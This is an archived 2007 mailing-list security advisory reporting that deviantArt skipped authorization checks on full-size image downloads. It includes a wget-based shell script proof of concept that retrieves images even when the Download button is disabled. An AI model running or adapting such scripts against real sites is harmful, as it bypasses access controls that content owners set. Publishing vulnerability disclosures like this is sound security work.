lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200706271142.09655.tredaelli@inventati.org>
Date: Wed, 27 Jun 2007 11:41:23 +0200
From: Timothy Redaelli <tredaelli@...entati.org>
To: bugtraq-post <bugtraq@...urityfocus.com>,
	full-post <full-disclosure@...ts.grok.org.uk>
Subject: deviantArt does not check authorization for image
	download

Security Advisory
-----------------
Title:        deviantArt does not check authorization for image download
Risk Rating:  High
Platforms:    Any
Author:       Timothy Redaelli <tredaelli@...entati.org>
Date:         27-06-2007

Overview
--------
deviantArt does not apply any type of authorization checking for full-size 
image download.

Details
-------
It is possibile to download the full-size (as uploaded) image also if the 
Download button is disabled.

Proof of Concept
----------------
#!/bin/sh
# Copyright (c) 2007 Timothy Redaelli <tredaelli@...entati.org>

URL=$1

download()
{
        wget -U "" -nv "$@"
}

parse()
{
        wget -U "" http://www.deviantart.com/download/"$URL"/ && exit 0
        URLS=$(wget -qU "" -O - http://www.deviantart.com/deviation/"$URL"/ | 
fgrep 'deviantART.pageData' | sed -e 's/^.*"fullview":
{[^}]*"\(http[^"]*\).*$/\1/' -e 's/\\//g' | awk -F / '{for (i = 0; i <= 0xF; 
i++) for (j = 0; j <= 0xF; j++) 
printf "http://69.28.181.52/%s/f/%s/%s/%x/%x/%s\n", $4, $6, $7, i, j, $10}')
}

parse "$1"

echo "$URLS" | while read x; do
        download "$x" && exit 0
done

Timeline
--------
Mar 26, 2007 -- Bug discovery.
Mar 27, 2007 -- Contact deviantArt, no reply.
Jun 26, 2007 -- Recontact deviantArt, still no reply.
Jun 27, 2007 -- Bug published.

Credits
-------
* Timothy Redaelli <tredaelli@...entati.org>

-- 
Timothy Redaelli
http://timothyredaelli.wordpress.com/

Download attachment "signature.asc " of type "application/pgp-signature" (190 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ